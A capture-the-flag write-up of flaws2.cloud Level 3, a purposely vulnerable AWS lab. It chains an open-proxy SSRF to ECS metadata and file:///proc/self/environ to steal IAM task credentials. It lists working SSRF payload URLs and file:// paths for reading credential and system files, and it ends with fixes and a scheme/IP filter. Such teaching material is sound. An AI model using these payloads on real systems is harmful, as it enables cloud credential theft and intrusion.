# flaws2.cloud — Attacker Path — Level 3
**Vulnerability:** SSRF via an open proxy on an ECS/Fargate container → /proc/self/environ leaks the credential GUID → ECS metadata endpoint returns IAM role credentials
## Level 2 Recap
The container image in ECR had credentials baked into its docker history — the `htpasswd -b` command stored the plaintext password permanently in the image layer metadata. `docker history --no-trunc` revealed it. The lesson: never pass secrets as command-line arguments in `RUN` commands inside a Dockerfile.
## What Changed From Level 2 to Level 3
The web app running at http://container.target.flaws2.cloud/ now has a proxy endpoint — same pattern as flaws.cloud level 5. The proxy fetches any URL you pass it:
```
http://container.target.flaws2.cloud/proxy/http://flaws.cloud
http://container.target.flaws2.cloud/proxy/http://neverssl.com
```
This is SSRF again. But with a twist: this is not an EC2 instance, it's an ECS container. Different runtime = different metadata endpoint = different attack path.
## Core Concepts First

### What is ECS?
ECS = Elastic Container Service. AWS's managed service for running Docker containers at scale. Instead of launching an EC2 instance, installing Docker, and running containers yourself, ECS handles the orchestration — scheduling, placement, health checks, scaling, networking.
EC2 vs ECS in plain terms:
| | EC2 | ECS |
|---|---|---|
| What you manage | The whole VM (OS, patches, Docker install) | Just your container image |
| What AWS manages | Physical hardware only | Scheduling, placement, health, networking |
| Unit of work | Instance | Task (one or more containers) |
| Billing | Per instance-hour | Per vCPU/memory used by tasks |
| SSH into it? | Yes | Only if running on EC2 launch type (not Fargate) |
ECS launch types:
| Launch Type | What it means |
|---|---|
| EC2 | ECS runs your containers on EC2 instances you provision. You manage the underlying VMs |
| Fargate | AWS manages the underlying infrastructure entirely. You specify CPU/memory, AWS handles the rest. No VMs to manage, no SSH |
This level runs on Fargate — the `AWS_EXECUTION_ENV=AWS_ECS_FARGATE` env var confirms it.
### ECS Architecture — Key Terms
| Term | What it is |
|---|---|
| Cluster | A logical grouping of tasks/services |
| Task Definition | The blueprint for a container — image, CPU, memory, environment variables, IAM role |
| Task | A running instance of a task definition — one or more containers running together |
| Service | Keeps a specified number of tasks running continuously (like a daemon) |
| Task IAM Role | The IAM role the container assumes to make AWS API calls — same concept as Lambda's execution role |
### Why Are the Metadata Endpoints Different?
- EC2 metadata: `169.254.169.254`
- ECS/Fargate credentials: `169.254.170.2`
They're different because they're different services implemented by different teams at AWS. The EC2 metadata service is a baked-in feature of the EC2 hypervisor — every virtual machine gets it for free. ECS containers don't have a hypervisor in the same way (especially on Fargate), so AWS built a separate credential proxy service that runs alongside ECS tasks.
169.254.170.2 is the IP of the ECS Task Metadata Endpoint — a local HTTP service AWS runs inside the container's network namespace. It's only reachable from within the task itself, just like 169.254.169.254 is only reachable from within an EC2 instance.
Full metadata endpoint comparison:
| Platform | Credential endpoint | Auth required |
|---|---|---|
| EC2 (IMDSv1) | `169.254.169.254/latest/meta-data/iam/security-credentials/ROLENAME` | None |
| EC2 (IMDSv2) | Same IP, but requires PUT token first | Yes (session token) |
| ECS / Fargate | `169.254.170.2/v2/credentials/GUID` | None (but you need the GUID) |
| GCP | `169.254.169.254/computeMetadata/v1/` | `Metadata-Flavor: Google` header required |
| Azure | `169.254.169.254/metadata/instance` | `Metadata: true` header required |
## The SSRF Recon Checklist
When you find SSRF, try in this order:
1. EC2: `http://169.254.169.254/latest/meta-data/`
   → If it returns instance info, you're on EC2
2. ECS: `http://169.254.170.2/v2/credentials`
   → If EC2 returns nothing/times out, try this
   → Need to get the GUID from `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI` first
3. ECS metadata: `http://169.254.170.2/v2/metadata`
   → Returns task/container info including cluster, task ARN, container names
4. GCP: `http://metadata.google.internal/computeMetadata/v1/`
   (requires `Metadata-Flavor: Google` header — often not possible via simple SSRF)
5. Azure: `http://169.254.169.254/metadata/instance?api-version=2021-02-01`
   (requires `Metadata: true` header)
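The checklist above can be sketched as a small URL builder — given the base of whatever open proxy you found, produce the candidate metadata URLs in probing order. The function name `probe_urls` is a hypothetical helper, not part of any tool used in this level:

```python
# Candidate metadata endpoints, in the order the checklist says to try them.
CHECKLIST = [
    ("EC2",          "http://169.254.169.254/latest/meta-data/"),
    ("ECS creds",    "http://169.254.170.2/v2/credentials"),
    ("ECS metadata", "http://169.254.170.2/v2/metadata"),
    ("GCP",          "http://metadata.google.internal/computeMetadata/v1/"),
    ("Azure",        "http://169.254.169.254/metadata/instance?api-version=2021-02-01"),
]

def probe_urls(proxy_base):
    """Return (platform, full-URL) pairs to request through an open proxy."""
    base = proxy_base.rstrip("/")
    return [(name, f"{base}/{target}") for name, target in CHECKLIST]
```

Note the GCP and Azure entries are mostly futile through a path-based proxy, since it can't set the required headers.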
Signal that told you this isn't EC2: Hitting `http://169.254.169.254/latest/meta-data/` returned nothing (or blank). The EC2 metadata service answers on that IP on essentially every EC2 instance (unless IMDS has been explicitly disabled). No response = almost certainly not EC2 = try ECS next.
## Step 1 — Try EC2 Metadata (Fails)
```
http://container.target.flaws2.cloud/proxy/http://169.254.169.254/latest/meta-data/iam/security-credentials/
```
Returns nothing. Confirms this is not an EC2 instance.
## Step 2 — Try ECS Metadata (Succeeds)
Fetching `http://169.254.170.2/v2/metadata` through the proxy returns a JSON blob:
```json
{
  "Cluster": "arn:aws:ecs:us-east-1:653711331788:cluster/level3",
  "TaskARN": "arn:aws:ecs:us-east-1:653711331788:task/level3/1491c70b82a2428a9a14b1a94817b2db",
  "Family": "level3",
  "Revision": "3",
  "DesiredStatus": "RUNNING",
  "KnownStatus": "RUNNING",
  "Containers": [{
    "Name": "level3",
    "Image": "653711331788.dkr.ecr.us-east-1.amazonaws.com/level2",
    "Networks": [{"NetworkMode": "awsvpc", "IPv4Addresses": ["172.31.66.153"]}]
  }],
  "AvailabilityZone": "us-east-1e"
}
```
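A minimal sketch of pulling the recon-relevant fields out of that blob — the account ID is the fifth colon-separated field of any ARN, so the metadata alone hands you account, cluster, and image:

```python
import json

# Shortened copy of the task metadata returned in Step 2.
blob = """{
  "Cluster": "arn:aws:ecs:us-east-1:653711331788:cluster/level3",
  "TaskARN": "arn:aws:ecs:us-east-1:653711331788:task/level3/1491c70b82a2428a9a14b1a94817b2db",
  "Family": "level3",
  "Containers": [{"Image": "653711331788.dkr.ecr.us-east-1.amazonaws.com/level2"}]
}"""

meta = json.loads(blob)
account_id = meta["TaskARN"].split(":")[4]       # ARN field 5 is the account ID
cluster = meta["Cluster"].rsplit("/", 1)[-1]     # last path segment of the cluster ARN
image = meta["Containers"][0]["Image"]           # the ECR image the task runs
```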
### What this tells you
| Field | Value | What it means |
|---|---|---|
| `Cluster` | `cluster/level3` | The ECS cluster name |
| `TaskARN` | `task/level3/1491c70b...` | Unique ID of this running task |
| `Family` | `level3` | Task definition name |
| `Image` | `653711331788.dkr.ecr.us-east-1.amazonaws.com/level2` | The Docker image running in this container (same image from level 2) |
| `NetworkMode` | `awsvpc` | Container has its own VPC network interface (Fargate networking mode) |
| `AvailabilityZone` | `us-east-1e` | Which AZ the task is running in |
This is useful intelligence, but it doesn't give you credentials. For credentials on ECS/Fargate you need the credential endpoint at 169.254.170.2/v2/credentials/GUID.
## Step 3 — Getting the GUID
The ECS credential endpoint isn't just 169.254.170.2/v2/credentials — it's 169.254.170.2/v2/credentials/<GUID>. The GUID is unique per task run and acts as a weak token. Without it, you get nothing.
Where is the GUID? In the environment variable `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`. This variable is automatically injected by AWS into every ECS/Fargate container — it contains the relative path to the credential endpoint, GUID included.
How to get it: via the proxy, fetch the Linux `/proc/self/environ` file.
## Step 4 — Read Environment Variables via /proc/self/environ

### What is /proc?
/proc is a virtual filesystem in Linux — it doesn't exist on disk. It's generated on-the-fly by the kernel and exposes real-time information about running processes, hardware, and system state.
| Path | What it contains |
|---|---|
| `/proc/self/` | Info about the current process (the one reading it) |
| `/proc/self/environ` | All environment variables for the current process, null-byte separated |
| `/proc/self/cmdline` | The command that started the process |
| `/proc/self/maps` | Memory map — what code/libraries are loaded |
| `/proc/self/fd/` | Open file descriptors |
| `/proc/<PID>/` | Same info but for any process by PID |
`/proc/self/environ` is particularly valuable in pentesting because it contains every environment variable the process was started with — which in cloud environments includes credentials, connection strings, API keys, and in this case the credential GUID.
### What is file://?
file:// is a URI scheme — like http:// or https://, but for local filesystem paths.
```
file:///proc/self/environ
↑
Three slashes: scheme + empty host + absolute path
= file:// + (empty hostname) + /proc/self/environ
```
When the proxy fetches a file:// URL, it reads from the local filesystem of the server, not from the network. This only works if the proxy implementation doesn't restrict URI schemes. Many naive proxy implementations only filter by IP address but forget to block file:// entirely — which lets you read arbitrary files on the server.
What `file://` can expose beyond env vars:

```
file:///etc/passwd              # user accounts
file:///etc/hosts               # internal hostnames
file:///root/.aws/credentials   # AWS credentials file
file:///app/config.py           # application source code
file:///proc/self/cmdline       # command that started the process
file:///proc/1/environ          # env vars of PID 1 (init process)
```
### The Output
The env vars come back null-byte separated (each variable separated by `\0`). Broken out:

```
HOSTNAME=ip-172-31-66-153.ec2.internal
HOME=/root
AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/adadba83-b9a3-4254-821e-165328963392
AWS_EXECUTION_ENV=AWS_ECS_FARGATE
ECS_AGENT_URI=http://169.254.170.2/api/1491c70b82a2428a9a14b1a94817b2db-3779599274
AWS_DEFAULT_REGION=us-east-1
ECS_CONTAINER_METADATA_URI_V4=http://169.254.170.2/v4/1491c70b82a2428a9a14b1a94817b2db-3779599274
ECS_CONTAINER_METADATA_URI=http://169.254.170.2/v3/1491c70b82a2428a9a14b1a94817b2db-3779599274
AWS_REGION=us-east-1
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
```
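Because the raw output is NUL-separated rather than newline-separated, it needs a small parsing step before you can read it. A sketch, using a shortened copy of the blob above:

```python
# Raw /proc/self/environ output: KEY=VALUE pairs joined by NUL bytes.
raw = (b"HOSTNAME=ip-172-31-66-153.ec2.internal\x00"
       b"AWS_CONTAINER_CREDENTIALS_RELATIVE_URI="
       b"/v2/credentials/adadba83-b9a3-4254-821e-165328963392\x00"
       b"AWS_EXECUTION_ENV=AWS_ECS_FARGATE\x00")

# Split on NUL, then split each pair on the first '=' only
# (values can legally contain '=' themselves).
env = dict(
    pair.split("=", 1)
    for pair in raw.decode().split("\x00")
    if "=" in pair
)

# The relative URI plus the fixed IP gives the full credential URL.
cred_url = "http://169.254.170.2" + env["AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"]
```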
### Key vars explained
| Variable | Value | What it tells you |
|---|---|---|
| `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI` | `/v2/credentials/adadba83-...` | The GUID path you need to get credentials |
| `AWS_EXECUTION_ENV` | `AWS_ECS_FARGATE` | Confirms this is Fargate, not ECS on EC2 |
| `ECS_AGENT_URI` | `http://169.254.170.2/api/...` | ECS agent API endpoint for this specific container |
| `ECS_CONTAINER_METADATA_URI_V4` | `http://169.254.170.2/v4/...` | v4 metadata endpoint (newer, more detailed) |
| `ECS_CONTAINER_METADATA_URI` | `http://169.254.170.2/v3/...` | v3 metadata endpoint |
| `HOSTNAME` | `ip-172-31-66-153.ec2.internal` | Container's internal hostname (still `ec2.internal` even on Fargate) |
The GUID is `adadba83-b9a3-4254-821e-165328963392`.
## Step 5 — Get the Credentials
```
http://container.target.flaws2.cloud/proxy/http://169.254.170.2/v2/credentials/adadba83-b9a3-4254-821e-165328963392
```
### Why the GUID matters
The GUID is the only protection on this endpoint. The IP `169.254.170.2` isn't routable from outside, so in normal operation only the container itself can reach it. But with SSRF, you can reach it from "outside" via the server. The GUID adds a layer of obscurity — without knowing it, you can't just brute-force `/v2/credentials` because the GUID has 2^122 possible values.
It's not cryptographic authentication — it's a secret path. Think of it as a password that's only stored in the environment, with the assumption that only the container can read its own env vars. SSRF breaks that assumption when combined with /proc/self/environ.
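The 2^122 figure comes from the structure of a version-4 UUID: 6 of its 128 bits are fixed version/variant bits, leaving 122 random ones. A quick back-of-envelope on why blind guessing is hopeless:

```python
# A v4 UUID has 128 bits, 6 of which are fixed (version + variant),
# leaving 122 random bits - the brute-force search space for the GUID path.
guid_search_space = 2 ** 122

# Even at a wildly optimistic billion guesses per second,
# exhausting the space takes astronomically long.
seconds_needed = guid_search_space / 1e9
years_needed = seconds_needed / (60 * 60 * 24 * 365)
```

So the weakness is never guessing the GUID — it's that the GUID sits in an environment variable readable through the same SSRF.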
Returns:

```json
{
  "RoleArn": "arn:aws:iam::653711331788:role/level3",
  "AccessKeyId": "<REDACTED_ACCESS_KEY_ID>",
  "SecretAccessKey": "<REDACTED_SECRET_KEY>",
  "Token": "<REDACTED_SESSION_TOKEN>",
  "Expiration": "..."
}
```
Same pattern as the EC2 metadata credentials from flaws.cloud level 5 — temporary credentials (ASIA... prefix), require a session token, expire after a few hours.
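The `ASIA` prefix mentioned above is a documented AWS convention — access key IDs encode their type in the first four characters. A sketch of classifying a captured key (`classify_access_key` is a hypothetical helper, not an AWS API):

```python
def classify_access_key(access_key_id: str) -> str:
    """Classify an AWS access key ID by its well-known prefix."""
    if access_key_id.startswith("ASIA"):
        return "temporary"   # STS credentials - only valid with a session token
    if access_key_id.startswith("AKIA"):
        return "long-lived"  # IAM user access key
    return "unknown"
```

A `temporary` result tells you two things: you must also supply the session token, and the window to use the credentials is limited by their expiry.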
## Step 6 — Configure and Use
```bash
aws configure --profile flaws2-level3
# AccessKeyId: <from above>
# SecretAccessKey: <from above>
# region: us-east-1
aws configure set aws_session_token <token> --profile flaws2-level3
aws sts get-caller-identity --profile flaws2-level3
```
Then enumerate what this role can access — the task's IAM role determines what you can do with these credentials.
## The Full Attack Chain
```
Open proxy at /proxy/<url>
    ↓
Try EC2 metadata: http://169.254.169.254/latest/meta-data/
    → No response = not EC2
    ↓
Try ECS metadata: http://169.254.170.2/v2/metadata
    → Returns task info, confirms ECS/Fargate
    → But no credentials here
    ↓
Need the GUID from AWS_CONTAINER_CREDENTIALS_RELATIVE_URI
    ↓
Fetch env vars via: file:///proc/self/environ
    → Proxy fetches local filesystem file
    → env vars include AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/adadba83-...
    ↓
Use GUID to hit credential endpoint:
    http://169.254.170.2/v2/credentials/adadba83-b9a3-4254-821e-165328963392
    → Returns AccessKeyId + SecretAccessKey + Token
    ↓
aws configure --profile flaws2-level3 + set session token
    ↓
Enumerate what the task's IAM role can access
```
## EC2 vs ECS vs Fargate Credential Flow Comparison
| Aspect | EC2 | ECS on EC2 | ECS Fargate |
|---|---|---|---|
| Credential source | `169.254.169.254/latest/meta-data/iam/security-credentials/ROLENAME` | `169.254.170.2/v2/credentials/GUID` | `169.254.170.2/v2/credentials/GUID` |
| How to find role name | Hit metadata, it returns the role name | Need GUID from env var | Need GUID from env var |
| How to get GUID | N/A | `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI` env var | `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI` env var |
| How to read env vars | `/proc/self/environ` or EC2 user-data | `/proc/self/environ` | `/proc/self/environ` |
| SSH access | Yes | Yes (into the EC2 host) | No — no underlying VM |
| IMDSv2 protection | Yes (PUT token required) | Partially (EC2 metadata) | Different endpoint, different protection |
## Vulnerability Summary
The flaws (three compounding issues):
1. **Open proxy with no URI scheme validation.** The proxy accepts `file://` URIs, not just `http://`. A properly secured proxy would whitelist URI schemes (`http` and `https` only) and reject anything else.
2. **`/proc/self/environ` readable via `file://`.** Linux makes process environment variables readable via the virtual filesystem. This is normal and expected behaviour — but it becomes a vulnerability when combined with an open proxy that accepts `file://` URIs.
3. **ECS credential endpoint reachable via SSRF.** The `169.254.170.2` endpoint is designed to be internal-only. With SSRF, the proxy fetches it from within the container's network, bypassing the network isolation.
Why this is more complex than level 5 (flaws.cloud):
- Level 5: EC2 metadata at `169.254.169.254` — no GUID needed, direct path
- Level 3 here: ECS at `169.254.170.2` — need the GUID, which requires a second SSRF step via `file:///proc/self/environ`
It's the same core vulnerability (SSRF) but requires chaining two requests instead of one.
The fix:
- Validate URI schemes in any proxy — whitelist `http` and `https` only; reject `file://`, `ftp://`, `gopher://`, etc.
- Block requests to link-local ranges (169.254.0.0/16) and private ranges (10.x, 172.16.x, 192.168.x) at the proxy level
- For ECS: consider using IMDSv2-style protection for the credentials endpoint (AWS has added this in newer ECS agent versions)
- Scope task IAM roles to minimum necessary permissions — if credentials are stolen, limit the blast radius
- The `file://` SSRF + `/proc/self/environ` pattern is a well-known attack chain — it should be in every proxy's block list
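A minimal sketch of the first two fixes (scheme whitelist plus link-local/private IP blocking). This only checks literal IPs — a production proxy would also resolve hostnames and re-check the resolved address to defeat DNS rebinding, which this deliberately skips:

```python
import ipaddress
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}

def is_blocked_host(host: str) -> bool:
    """True if the host is a literal IP in a link-local, private, or loopback range."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # a hostname, not a literal IP - would need DNS resolution to judge
    return ip.is_link_local or ip.is_private or ip.is_loopback

def is_safe_proxy_target(url: str) -> bool:
    """Reject non-http(s) schemes and internal IP destinations."""
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_SCHEMES:
        return False  # blocks file://, gopher://, ftp://, ...
    if parsed.hostname is None or is_blocked_host(parsed.hostname):
        return False  # blocks 169.254.x.x, 10.x, 172.16.x, 192.168.x, 127.x
    return True
```

Against this level's attack chain: both the `file:///proc/self/environ` read and the `http://169.254.170.2/...` fetches would have been rejected.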
The broader lesson: SSRF vulnerabilities rarely stop at a single request. The real damage comes from chaining: SSRF to read env vars, env vars to find a GUID, GUID to get credentials, credentials to access cloud resources. Each step expands what's possible. When you find SSRF, always chase the chain.